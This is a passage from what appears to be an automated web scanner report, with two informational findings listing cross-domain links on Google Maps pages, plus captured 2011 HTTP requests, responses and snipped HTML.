<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_9154132767753732860" jsaction="si.togglePanelStarring" jsprops="markerid:'E';b_s:2" data-authtoken="bf0fe113:l8-8eVqPtQ5zQk-Wk3NY1YEYcJo" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'F'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CJkBEP4LMAU id="marker_F_2"><img alt="F" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconF"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_12589854273086256974" jsaction="si.togglePanelStarring" jsprops="markerid:'F';b_s:2" data-authtoken="57c9f75d:J_ZCKE9V1BEmeXssuEZTn7IuJzo" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'G'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CKYBEP4LMAY id="marker_G_2"><img alt="G" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconG"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_15850435201604415516" jsaction="si.togglePanelStarring" jsprops="markerid:'G';b_s:2" data-authtoken="389b4e23:G48dU1hyoil_EcazWDSlG2D3w-o" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'H'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CLEBEP4LMAc id="marker_H_2"><img alt="H" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconH"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_2044736647202142039" jsaction="si.togglePanelStarring" jsprops="markerid:'H';b_s:2" data-authtoken="217cbd74:U1lKp_ybAOxjPxLIK5OiTKimYAg" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'I'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CLsBEP4LMAg id="marker_I_2"><img alt="I" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconI"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_11708711014985907974" jsaction="si.togglePanelStarring" jsprops="markerid:'I';b_s:2" data-authtoken="9ada7928:YKPfmSi5W931NfJu0dwbtzQ4z-M" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'J'" jstrack="cnlJTYG9Lpi2ywS5oYHHDQ" ved=0CMUBEP4LMAk id="marker_J_2"><img alt="J" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconJ"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_13484172575208014483" jsaction="si.togglePanelStarring" jsprops="markerid:'J';b_s:2" data-authtoken="df4673db:dWMObIKupVSV9zTy71cMMa57e60" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div><img class="btp bt noprint" src="http://static.panoramio.com/photos/iw-thumbnail/5525436.jpg" /><div>
...[SNIP]...
vYWQEc2VjA3RpdGxlBHNlbQNnb29nbGUEc2VtX2FjdAM0MDY1NTI2MDAwBHNlbV9hZGcDMjkxNjU5NDA3BHNlbV9jbXADMTE5MTk5NjcEc2VtX2t3aWQDMjY4NjE4Mzg2NwRzbGsDa2I-%3Fp%3Dmillenium%2520boston%26sem%3Dgoogle" target="_blank"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/textad_icon.png"/></a>
...[SNIP]...

17.144. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?hl\x3den\x26tab\x3dwl\x22

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps?hl\x3den\x26tab\x3dwl\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5Cx3den%5Cx26tab%5Cx3dwl%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

17.145. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wl

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/adicon_w.png
http://maps.gstatic.com/intl/en_us/mapfiles/admarker.png
http://maps.gstatic.com/intl/en_us/mapfiles/admarker_shadow.png
http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png
http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png
http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/gw_link.png
http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CPWQ1cSPg87XTxAQGBAoATIIqbcvGKQlMhQ
http://static.panoramio.com/photos/iw-thumbnail/5525436.jpg
http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=l1

Request

GET /maps?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=wl HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:34:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&hl=en&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" title="Google Maps Labs" id="ml_flask_img" class="flask"/> <span id="ml_flask_msg">
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="panel-bar-divider bar-divider"/> </span>
...[SNIP]...
<a style="display:none" jsdisplay="topbar_config.show_lbc_badge" jsvalues="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span msgid="13425" class="link-text">
...[SNIP]...
<a style="display:" jsvalues="style.display: topbar_config.show_panel_toggler ? '' : 'none';" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img title="Hide panel" useattr="title:#msg_hide_panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a> <a style="display:none" href="" jsvalues="style.display: topbar_config.show_return_arrow ? '' : 'none'; href: topbar_config.return_arrow_url" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img title="Map View" useattr="title:#msg_map_view" src="http://maps.gstatic.com/mapfiles/transparent.png" class="collapse-left3"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_rss_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-rss"/> <span msgid="11196" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon view-as-kml"/> <span msgid="11754" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> </span> <a style="display:none" href="javascript:void(0)" id="mapmaker-link" jsaction="rmi.open-mapmaker"> <img class="bar-icon" src="http://maps.gstatic.com/mapfiles/gw_link.png"/> <span msgid="13326" class="link-text">
...[SNIP]...
</a> <img style="display:none" id="mapmaker-link-sep" src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="print.show" id="print"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-print2"/> <span msgid="10044" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a id="showsendtox" href="javascript:void(0);" jsaction="stx.show"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-email2"/> <span msgid="11023" class="link-text">
...[SNIP]...
</a> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon-divider bar-divider"/> <a href="javascript:void(0);" jsaction="link.show" id="link"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="bar-icon bar-icon-link2"/> <span msgid="12145" class="link-text">
...[SNIP]...
</div> <img style="left:114px;top:-115px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:120px;top:-121px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:120px;top:-121px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:207px;top:-74px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfiles
...[SNIP]...
</div> <img style="left:207px;top:-74px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-226px;top:145px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:-226px;top:145px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:120px;top:-131px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:120px;top:-131px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:23px;top:16px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfiles/s
...[SNIP]...
</div> <img style="left:23px;top:16px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:132px;top:-213px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:132px;top:-213px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:-27px;top:-208px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:-27px;top:-208px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:147px;top:-164px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfile
...[SNIP]...
</div> <img style="left:147px;top:-164px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="shadow50" style="left:21px;top:-163px;width:37px;height:34px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/mapfiles
...[SNIP]...
</div> <img style="left:21px;top:-163px;width:37px;height:34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/shadow50.png" class="hide-msie-6"/> <div __src__="admarker_shadow" style="left:130px;top:-153px;width:34px;height:24px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(sizingMethod=crop,src='http://maps.gstatic.com/intl/en_us/
...[SNIP]...
</div> <img style="left:130px;top:-153px;width:34px;height:24px" src="http://maps.gstatic.com/intl/en_us/mapfiles/admarker_shadow.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:0px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-34px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-68px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-102px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-136px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-170px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-204px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-238px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-272px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img style="left:0px;top:-306px" src="http://maps.gstatic.com/intl/en_us/mapfiles/red_markers_A_J2.png" class="hide-msie-6"/> </div>
...[SNIP]...
</div> <img src="http://maps.gstatic.com/intl/en_us/mapfiles/admarker.png" class="hide-msie-6"/> <img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPWQ1cSPg87XTxAQGBAoATIIqbcvGKQlMhQ" class="lbalogo_inline hide-msie-6"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp" class="flmcpanup clickable">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img id="zoom_out_inline_img" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img style="width:114px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="marker" log="miw" id="marker_top1_2" onclick="return openLbaInfoWindow('top1','maps_panel_marker_bubble_open')"><img class="pushpin" src="http://maps.gstatic.com/intl/en_us/mapfiles/adicon_w.png"/><img class="mp label" src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPWQ1cSPg87XTxAQGBAoATIIqbcvGKQlMhQ"/></div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CEkQ_gswAA id="marker_A_2"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_17132826041081042467" jsaction="si.togglePanelStarring" jsprops="markerid:'A';b_s:2" data-authtoken="8246c6e4:o3CKOytm_e7T9UEcW9ZOtHos8t0" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'B'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CFUQ_gswAQ id="marker_B_2"><img alt="B" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconB"/></div>
...[SNIP]...
<span jsaction="ab.topLevelClick" action="actbar-more" class="actbar-cmpct"><img src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="arrow-cmpct-img"></span>
...[SNIP]...
<span> <img class="unstarred noprint si_6814180606148787068" jsaction="si.togglePanelStarring" jsprops="markerid:'B';b_s:2" data-authtoken="e4d120bb:-6FDKb37NTal1O24WV1m4f9ioMI" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" id="pp-starred-item-star" log="si_lhs" width="21" height="14"/> </span>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'C'" jstrack="cXlJTemCG4iSywT0wIzFDQ" ved=0CGAQ_gswAg id="marker_C_2"><img alt="C" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconC"/></div>
...[SNIP]...
